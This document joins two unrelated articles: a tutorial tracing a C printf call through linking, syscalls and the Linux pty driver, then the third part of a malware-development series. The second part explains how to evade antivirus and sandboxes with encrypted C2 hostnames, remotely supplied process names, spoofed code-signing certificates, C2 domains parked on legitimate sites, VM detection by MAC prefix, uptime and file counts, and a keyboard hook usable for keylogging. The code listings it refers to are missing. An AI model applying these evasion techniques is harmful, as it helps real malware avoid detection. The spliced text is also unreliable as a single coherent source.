$ gcc printf1.c -o printf1            # Better printf dynamic linking
$ gcc printf0.c -o printf0_s -static  # Trivial printf static linking
$ gcc printf1.c -o printf1_s -static  # Better printf static linking

Possible trap: You need to have the static standard library available to statically link (libc.a). Most systems already have the shared library built-in (libc.so). Windows users will need a libc.lib and maybe a libmsvcrt.lib. I haven’t tested in an MS environment in a while.

Static linking pulls all the standard library object code in to the executable. The benefit for us is that all of the code executed in user space is now self-contained in this single file and we can easily trace to see the standard library functions. In real life, you rarely want to do this. This disadvantages are just too great, especially for maintainability. Here’s an obvious disadvantage:

$ ls -l printf1*
total 1696
-rwxrwxr-x. 1 maiz maiz   8520 Mar 31 13:38 printf1     # Dynamic
-rw-rw-r--. 1 maiz maiz    101 Mar 31 12:57 printf1.c
-rw-rw-r--. 1 maiz maiz   1520 Mar 31 13:37 printf1.o
-rwxrwxr-x. 1 maiz maiz 844000 Mar 31 13:40 printf1_s   # Static

Our test binary blew up from 8kb to 844kb. Let’s take a look at the symbol count in each:

$ nm printf1.o | wc -l
2                      # Object file symbol count (main, printf)
$ nm printf1 | wc -l
34                     # Dynamic-linked binary symbol count
$ nm printf1_s | wc -l
1873                   # Static-linked binary symbol count

Our original, unlinked object file had just the two symbols we already saw (main and printf). The dynamic-linked binary has 34 symbols, most of which correspond to the C runtime, which sets up the environment. Finally, our static-linked binary has nearly 2000 symbols, which include everything that could be used from the standard library.

As you may know, this has a significant impact on load-time and run-time


Step 5 — Loader prepares the run-time

Goal: Set up the execution environment

The dynamic-linked binary has more work to do than its static brother. The static version included 1873 symbols, but the dynamic binary only inluded 34 with the binary. It needs to find the code in shared libraries and memory map it in to the process address space. We can watch this in action by using strace.

Dynamic-linked printf() syscall trace

$ strace ./printf1
execve("./printf1", ["./printf1"], [/* 47 vars */]) = 0
brk(NULL) = 0x1dde000
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce82000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=83694, ...}) = 0
mmap(NULL, 83694, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f59bce6d000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2127336, ...}) = 0
mmap(NULL, 3940800, ..., 3, 0) = 0x7f59bc89f000
mprotect(0x7f59bca57000, 2097152, PROT_NONE) = 0
mmap(0x7f59bcc57000, 24576, ..., 3, 0x1b8000) = 0x7f59bcc57000
mmap(0x7f59bcc5d000, 16832, ..., -1, 0) = 0x7f59bcc5d000
close(3) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce6c000
mmap(NULL, 8192, ..., -1, 0) = 0x7f59bce6a000
arch_prctl(ARCH_SET_FS, 0x7f59bce6a740) = 0
mprotect(0x7f59bcc57000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7f59bce83000, 4096, PROT_READ) = 0
munmap(0x7f59bce6d000, 83694) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce81000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

Each line is a syscall. The first is just after bash clones in to printf1_s, and the write syscall is near the bottom. The 21 syscalls between brk and the final fstatare devoted to loading shared libraries. This is the load-time penalty for dynamic-linking. Don’t worry if this seems like a mess, we won’t be using it. If you’re interested in more detail, here is the full dump with walkthrough

Now let’s look at the memory map for the process

Dynamic-linked printf() memory map

$ cat /proc/3177/maps
00400000-00401000 r-xp 00000000         ./printf1
00600000-00601000 r--p 00000000         ./printf1
00601000-00602000 rw-p 00001000         ./printf1
7f59bc89f000-7f59bca57000 r-xp 00000000 /usr/lib64/libc-2.17.so
7f59bca57000-7f59bcc57000 ---p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc57000-7f59bcc5b000 r--p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc5b000-7f59bcc5d000 rw-p 001bc000 /usr/lib64/libc-2.17.so
7f59bcc5d000-7f59bcc62000 rw-p 00000000  
7f59bcc62000-7f59bcc83000 r-xp 00000000 /usr/lib64/ld-2.17.so
7f59bce6a000-7f59bce6d000 rw-p 00000000  
7f59bce81000-7f59bce83000 rw-p 00000000  
7f59bce83000-7f59bce84000 r--p 00021000 /usr/lib64/ld-2.17.so
7f59bce84000-7f59bce85000 rw-p 00022000 /usr/lib64/ld-2.17.so
7f59bce85000-7f59bce86000 rw-p 00000000  
7fff89031000-7fff89052000 rw-p 00000000 [stack]
7fff8914e000-7fff89150000 r-xp 00000000 [vdso]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

Our 8kb binary fits in to three 4kb memory pages (top three lines). The standard library has been mapped in to the ~middle of the address space. Code execution begins in the code area at the top, and jumps in to the shared library as needed.

This is the last I’ll mention the dynamic-linked version. We’ll use the static version from now on since it’s easier to trace.

Static-linked printf() syscall trace

$ strace ./printf1_s
execve("./printf1_s", ["./printf1_s"],[/*47 vars*/]) = 0
uname({sysname="Linux", nodename="...", ...}) = 0
brk(NULL) = 0x1d4a000
brk(0x1d4b1c0) = 0x1d4b1c0
arch_prctl(ARCH_SET_FS, 0x1d4a880) = 0
brk(0x1d6c1c0) = 0x1d6c1c0
brk(0x1d6d000) = 0x1d6d000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7faad3151000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

The static-linked binary uses far fewer syscalls. I’ve highlighted three of them near the bottom: fstatmmap, and write. These occur during printf(). We’ll trace this better in the next step. First, let’s look at the static memory map:

Static-linked printf() memory map

$ cat /proc/3237/printf1_s
00400000-004b8000 r-xp 00000000         ./printf1_s
006b7000-006ba000 rw-p 000b7000         ./printf1_s
006ba000-006df000 rw-p 00000000         [heap]
7ffff7ffc000-7ffff7ffd000 rw-p 00000000 
7ffff7ffd000-7ffff7fff000 r-xp 00000000 [vdso]
7ffffffde000-7ffffffff000 rw-p 00000000 [stack]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

No hint of a shared library. That’s because all the code is now included on the first two lines within the printf1_s binary. The static binary is using 187 pages of memory, just short of 800kb. This follows what we know about the large binary size.

Now we’ll move on to the more interesting part: execution.


Step 6 — printf call jumps to the standard library

Goal: Follow the standard library call sequence at run-time

The programmer shapes code for the printf interface then the run-time library bridges the standard API and the OS interface.

Key point: A compiler/library is free to handle logic any way it wants between interfaces. After printf is called, there is no standard defined procedure required, except that the correct output is produced and within certain boundaries. There are many possible paths to the output, and every toolchain handles it differently. In general, this work is done in two parts: A platform-independent side where a call to printf solves the format substitution problem (Step-6, Step 7). The other is a platform-dependent side, which calls in to the OS kernel using the properly-formatted string (Step 8).

The next three steps will focus solely on the static-linked version of printf. It’s less tedious to trace static-linked source, especially through the kernel in the next few steps. Note that the number of instructions executed between both are ~2300 for dynamic and ~1600 for static.

In addition to printf, compliant C compilers also implement:

fprintf() — A generalized version of printf except the output can go to any file stream, not just the console. fprintf is notable the C standard defines supported format types in its description. fprintf() isn’t used, but it’s good to know about since it’s related to the next function

vfprintf() — Similar to fprintf except the variadic arguments are reduced to a single pointer to a va_list. libc does almost all printing work in this function, including format replacement. (f)printf merely calls vfprintf almost immediately. vfprintf then uses the libio interface to write final strings to streams.

These high-level print functions obey buffering rules defined on the stream descriptor. The output string is constructed in the buffer using internal GCC (libio) functions. Finally, write is the final step before handing work to the kernel. If you aren’t familiar with how these work, I recommend reading about the GCC wayof managing I/O

Bonus: Some extra reading about buffering with nice diagrams

Let’s trace our path through the standard library

printf() execution sequence …printf execution continued
$ gdb ./printf1_s … main at printf1.c:5 5 printf(«Hello World %d\n», 1); 0x400e02 5 printf(«Hello World %d\n», 1); 0x401d30 in printf () 0x414600 in vfprintf () 0x40c110 in strchrnul () 0x414692 in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x424ba0 in _IO_new_file_overflow () 0x425ce0 in _IO_doallocbuf () 0x4614f0 in _IO_file_doallocate () 0x4235d0 in _IO_file_stat () 0x40f8b0 in _fxstat ()   ### fstat syscall 0x461515 in _IO_file_doallocate () 0x410690 in mmap64 ()   ### mmap syscall 0x46155e in _IO_file_doallocate () 0x425c70 in _IO_setb () 0x461578 in _IO_file_doallocate () 0x425d15 in _IO_doallocbuf () 0x424d38 in _IO_new_file_overflow () 0x4243c0 in _IO_new_do_write () 0x423cc1 in _IO_new_file_xsputn () 0x425dc0 in _IO_default_xsputn () …cut 11 repeats of last 2 functions… 0x425e7c in _IO_default_xsputn () 0x423d02 in _IO_new_file_xsputn () 0x41475e in vfprintf () 0x414360 in _itoa_word () 0x4152bb in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x40b840 in mempcpy () 0x423c6d in _IO_new_file_xsputn () 0x41501f in vfprintf () 0x40c110 in strchrnul () 0x414d1e in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x40b840 in mempcpy () 0x423c6d in _IO_new_file_xsputn () 0x424ba0 in _IO_new_file_overflow () 0x4243c0 in _IO_new_do_write () 0x4235e0 in _IO_new_file_write () 0x40f9c7 in write () 0x40f9c9 in __write_nocancel ()   ### write syscall happens here 0x423623 in _IO_new_file_write () 0x42443c in _IO_new_do_write () 0x423cc1 in _IO_new_file_xsputn () 0x414d3b in vfprintf () 0x408450 in free () 0x41478b in vfprintf () 0x408450 in free () 0x414793 in vfprintf () 0x401dc6 in printf () main at printf1.c:6

This call trace shows the entire execution for this printf example. If you stare closely at this code trace, we can follow this basic logic:

  • printf passes string and formats to vfprintf
  • vfprintf starts to parse and attempts its first buffered write
  • Oops — buffer needs to be allocated. Let’s find some memory
  • vfprintf back to parsing…
  • Copy some results to a final location
  • We’re done — call write()
  • Clean up this mess

Let’s look at some of the functions:

_IO_*These functions are part of GCC’s libio module, which manage the internal stream buffer. Just looking at the names, we can guess that there is a lot of writing and memory allocation. The source code for most of these operations is in the files fileops.c and genops.c.

_fxstat pulls the state of file descriptors. Since this is system dependent, it’s located at /sysdeps/unix/sysv/linux/fxstat64.c.

The remaining functions are covered in detail in the next two steps.

Let’s dig more!


Step 7 — Format string resolved

Goal: Solve the format problem

Let’s think about our input string, Hello World %d\n. There are three distinct sections that need to be processed as we scan across is from left to right.

  • 'Hello World ' — simple put
  • %d — substitute the integer literal ‘1’
  • \n — simple put

Now referring back to our trace, we can find three code sections that suggest where to look for the formatting work:

0x400e02 5  printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering 'Hello World '
...
0x41475e in vfprintf ()
0x414360 in _itoa_word ()          # converting integer
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '1'
...
0x41501f in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '\n'
...

A few function calls after that final vfprintf() call is the hand off to the kernel. The formatting must have happened in vfprintf between the instructions indicated above. All substitutions handed pointers to the finished string to libio for line buffering. Let’s take a peek at the first round only:

The hand off to xsputn requires vfprintf to identify the start location in the string and a size. The start is already known (current position), but it’s up to strchrnul() to find a pointer to the start of the next ‘%’ or the end of string. We can follow the parsing rules in GCC source code (/stdio-common/printf-*).

from glibc/stdio-common/printf-parse.h:

/* Find the next spec in FORMAT, or the end of the string.  Returns
   a pointer into FORMAT, to a '%' or a '\0'.  */
__extern_always_inline const unsigned char *
__find_specmb (const unsigned char *format)
{
  return (const unsigned char *) __strchrnul ((const char *) format, '%');
}

Or we can look in the compiled binary (my preferred timesink):

in vfprintf:
  0x414668 <+104>: mov    esi,0x25   # Setting ESI to the '%' symbol
  0x41466d <+109>: mov    rdi,r12    # Pointing RDI to the format string
  ...saving arguments...
  0x41468d <+141>: call   0x40c110 <strchrnul> # Search for next % or end

in strchrnul:
  0x40c110 <+0>: movd   xmm1,esi   # Loading up an SSE register with '%'
  0x40c114 <+4>: mov    rcx,rdi    # Moving the format string pointer
  0x40c117 <+7>: punpcklbw xmm1,xmm1 # Vector-izing '%' for a fast compare
  ...eventual return of a pointer to the next token...

Long story short, we’ve located where formats are found and processed.

That’s going to be the limit of peeking at source code for glibc. I don’t want this article to become an ugly mess. In any case, the buffer is ready to go after all three format processing steps.


Step 8 — Final string written to standard output

Goal: Follow events leading up to the kernel syscall

The formatted string, «Hello World 1», now lives in a buffer as part of the stdout file stream. stdout to a console is usually line buffered, but exceptions do exist. All cases for console stdout eventually lead to the ‘write’ syscall, which is prototyped for the particular system. UNIX(-like) systems conform to the POSIX standard, if only unofficially. POSIX defines the write syscall:

ssize_t write(int fildes, const void *buf, size_t nbyte);

From the trace in step 6, recall that the functions leading up to the syscall are:

0x4235e0 in _IO_new_file_write ()  # libio/fileops.c
0x40f9c7 in write ()               # sysdeps/unix/sysv/linux/write.c
0x40f9c9 in __write_nocancel ()    # various macros in libc and linux
  ### write syscall happens here

The link between the compiler and operating system is the ABI, and is architecture dependent. That’s why we see a jump from libc’s libio code to our test case architecture code under (gcc)/sysdeps. When your standard library and OS is compiled for your system, these links are resolved and only the applicable ABI remains. The resulting write call is best understood by looking at the object code in our program (printf1_s).

First, let’s tackle one of the common complaints from beginners reading glibc source code…the 1000 difference ways write() appears. At the binary level, this problem goes away after static-linking. In our case, write() == __write() == __libc_write()

$ nm printf1_s | grep write
6b8b20 D _dl_load_write_lock
41f070 W fwrite
400575 t _i18n_number_rewrite
40077f t _i18n_number_rewrite
427020 T _IO_default_write
4243c0 W _IO_do_write
4235e0 W _IO_file_write
41f070 T _IO_fwrite
4243c0 T _IO_new_do_write
4235e0 T _IO_new_file_write
421c30 T _IO_wdo_write
40f9c0 T __libc_write     ## Real write in symbol table
43b220 T __libc_writev
40f9c0 W write            ## Same address -- weak symbol
40f9c0 W __write          ## Same address -- weak symbol
40f9c9 T __write_nocancel
43b220 W writev
43b220 T __writev

So any reference to these symbols actually jumps to the same executable code. For what it’s worth, writev() == __writev(), and fwrite() == _IO_fwrite

And what does __libc_write look like…?

000000000040f9c0 <__libc_write>:
  40f9c0:  83 3d c5 bb 2a 00 00   cmpl   $0x0,0x2abbc5(%rip)  # 6bb58c <__libc_multiple_threads>
  40f9c7:  75 14                  jne    40f9dd <__write_nocancel+0x14>

000000000040f9c9 <__write_nocancel>:
  40f9c9:	b8 01 00 00 00       	mov    $0x1,%eax
  40f9ce:	0f 05                	syscall 
  ...cut...

Write simply checks the threading state and, assuming all is well, moves the write syscall number (1) in to EAX and enters the kernel.

Some notes:

  • x86-64 Linux write syscall is 1, old x86 was 4
  • rdi refers to stdout
  • rsi points to the string
  • rdx is the string size count

Step 9 — Driver writes output string

Goal: Show the execution steps from syscall to driver

Now we’re in the kernel with rdi, rsi, and rdx holding the call parameters. Console behavior in the kernel depends on your current environment. Two opposing cases are if you’re printing to native console/CLI or in a desktop pseudoterminal, such as GNOME Terminal.

I tested both types of terminals on my system and I’ll walk through the desktop pseudoterminal case. Counter-intuitively, the desktop environment is easier to explain despite the extra layers of work. The PTY is also much faster — the process has exclusive use of the pty where as many processes are aware of (and contend for) the native console.

We need to track code execution within the kernel, so let’s give Ftrace a shot. We’ll start by making a short script that activates tracing, runs our program, and deactivates tracing. Although execution only lasts for a few milliseconds, that’s long enough to produce tens or hundreds of thousands of lines of kernel activity.

#!/bin/sh
echo function_graph > /sys/kernel/debug/tracing/current_tracer
echo 1 > /sys/kernel/debug/tracing/tracing_on
./printf1_s
echo 0 > /sys/kernel/debug/tracing/tracing_on
cat /sys/kernel/debug/tracing/trace > output

Here is what happens after our static-linked printf executes the write syscall in a GNOME Terminal:

7)           | SyS_write() {
7)           |  vfs_write() {
7)           |   tty_write() {
7) 0.053 us  |    tty_paranoia_check();
7)           |    n_tty_write() {
7) 0.091 us  |     process_echoes();
7)           |     add_wait_queue()
7) 0.026 us  |     tty_hung_up_p();
7)           |     tty_write_room()
7)           |     pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |       queue_work_on()
7)+10.288 us |      } /* tty_flip_buffer_push */
7)           |      tty_wakeup() 
7)+14.687 us |     } /* pty_write */
7)+57.252 us |    } /* n_tty_write */
7)+61.647 us |   } /* tty_write */
7)+64.106 us |  } /* vfs_write */
7)+64.611 us | } /* SyS_write */

This output has been culled to fit this screen. Over 1000 lines of kernel activity were cut within SyS_write, most of which were locks and the kernel scheduler. The total time spent in kernel is 65 microseconds. This is in stark contrast to the native terminal, which took over 6800 microseconds!

Now is a good time to step back and think about how pseudoterminals are implemented. As I was researching a good way to explain it, I happened upon an excellent write up by Linus Åkesson. He explains far better than I could. This diagram he drew up fits our case perfectly.

The TL;DR version is that pseudoterminals have a master and a slave side. A TTY driver provides the slave functionality while the master side is controlled by a terminal process.

Let’s demonstrate that on my system. Recall that I’m testing through a gnome-terminal window.

$ ./printf1_s
Hello World 1
^Z
[1]+  Stopped                 ./printf1_s
$ top -o TTY
printf tty/pts usage

bash is our terminal parent process using pts/0. The shell forked (cloned) top and printf. Both inherited the bash stdin and stdout.

Let’s take a closer look at the pts/0 device the kernel associates with our printf1_s process.

$ ls -l /dev/pts/0
crw--w----. 1 maizure tty 136, 0 Apr  1 09:55 /dev/pts/0

Notice that the pseudoterminal itself is associated with a regular tty device. It also has a major number 136. What’s that?

From this linux kernel version sourceinclude/uapi/linux/major.h

...
#define UNIX98_PTY_MASTER_MAJOR	128
#define UNIX98_PTY_MAJOR_COUNT	8
#define UNIX98_PTY_SLAVE_MAJOR	(UNIX98_PTY_MASTER_MAJOR+UNIX98_PTY_MAJOR_COUNT)
...

Yes, this major number is associated with a pseudoterminal slave (Master = 128, Slave = 128 + 8 = 136). A tty driver is responsible for its operation. If we revisit our write syscall trace, this makes sense:

...cut from earlier
7)           |  pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |          queue_work_on()
7)+10.288 us |      }
7)           |      tty_wakeup() 
7)+14.687 us |  } /* pty_write */
...

The pty_write() function invokes tty_* operations, which we assume moves ‘Hello World 1’ to the console. So where is this console?


Step 10 — Console output buffer is updated

Goal: Put the string to the console attached to stdout

The first argument to pty_write is struct tty_struct *ttyThis struct contains the console, which is created with each unique tty process. In this case, the parent terminal created the pts/0 console and each child simply points to it.

The tty has many interesting parts to look at: line discipline, driver operations, the tty buffer(s), the tty_port. In the interest of space, I’m not going to cover tty initialization since it’s not on the direct path for printf — the process was created, the tty exists, and it wants this ‘Hello World 1’ right now!

The string is copied to the input queue in tty_insert_flip_string_fixed_flag().

memcpy(tb->char_buf_ptr + tb->used, chars, space); 
memset(tb->flag_buf_ptr + tb->used, flag, space);
tb->used += space;
copied += space;
chars += space;

This moves the data and flags to the current flip buffer. The console state is updated and the buffer is pushed:

if (port->low_latency)
    flush_to_ldisc(&buf->work);
else
    schedule_work(&buf->work);

Then the line discipline is notified to add the new string to the output window in tty_wakeup(). The typical case involves a kernel work queue, which is necessarily asynchronous. The string is waiting in the buffer with the signal to go. Now it’s up to the PT master to process it.

Our master is the gnome_temrinal, which manages the window context we see on screen. The buffer will eventually stream to the console on the kernel’s schedule. In a native console (not X server), this would be a segment of raw video memory. Once the pty master processes the new data…


Step 11 — Hello world!

Goal: Rejoice

$ ./printf1_s
Hello World 1

$

Success!
Now you know how it works on my system. How about yours?


FAQ

Why did you put this article together?
Recently, I was asked about how some functions are implemented several times over a short period and I couldn’t find a satisfactory resource to point to. Many blog posts focused too much on digging through byzantine compiler source code. I found that approach unhelpful because the compiler and standard library are only one part of the problem. This system-wide approach gives beginners a foundation, a path to follow, and helpful experiments to adapt to their own use.

What did you leave out?
Too much! It’ll have to wait until ‘printf() in 2500 seconds’. In no particular order:

  • Details about how glibc implements buffering
  • Details of how the GNOME console manages the terminal context
  • Flip buffer mechanics for ttys (similar to video backbuffers)
  • More about Linux work queues used in the tty driver
  • More discussion of how this process varies among architectures
  • Last (and definitely least): Untangling the mess inside vfprintf

How did you get gdb to print out that trace in step 6?
I used a separate file for automating gdb input and captured the output to another file.

$cat gdbcmds
start
stepi
stepi
stepi
stepi
...about 1000 more stepi...

$gdb printf1_s -x gdbcmds > printf1_s_dump

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to save time to write the final part of the series on Malware Development. But I am receiving too many DMs on Twitter accounts lately to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organization. One is at the network level where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze beacons of malwares and DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics), or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more of a trail and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a based understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easy detectable due to Microsoft’s AMSI (Anti-Malware Scan Interface) which consistently keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses DMTK(Microsoft Distributed Machine Learning Toolkit) framework which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision tree of our own to evade ML. This it supposed to work till Microsoft doesn’t start using CNTK framework which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to internet in every organization to fetch and verify the ceritificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the vicim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are much more different ways to evade ML and AV detection and they aren’t really that hard. Evading ML based AVs are not rocket science as people say. It’s just that it requires more of free time to sit and understand how the underlying architecture works and find flaws to evade it.

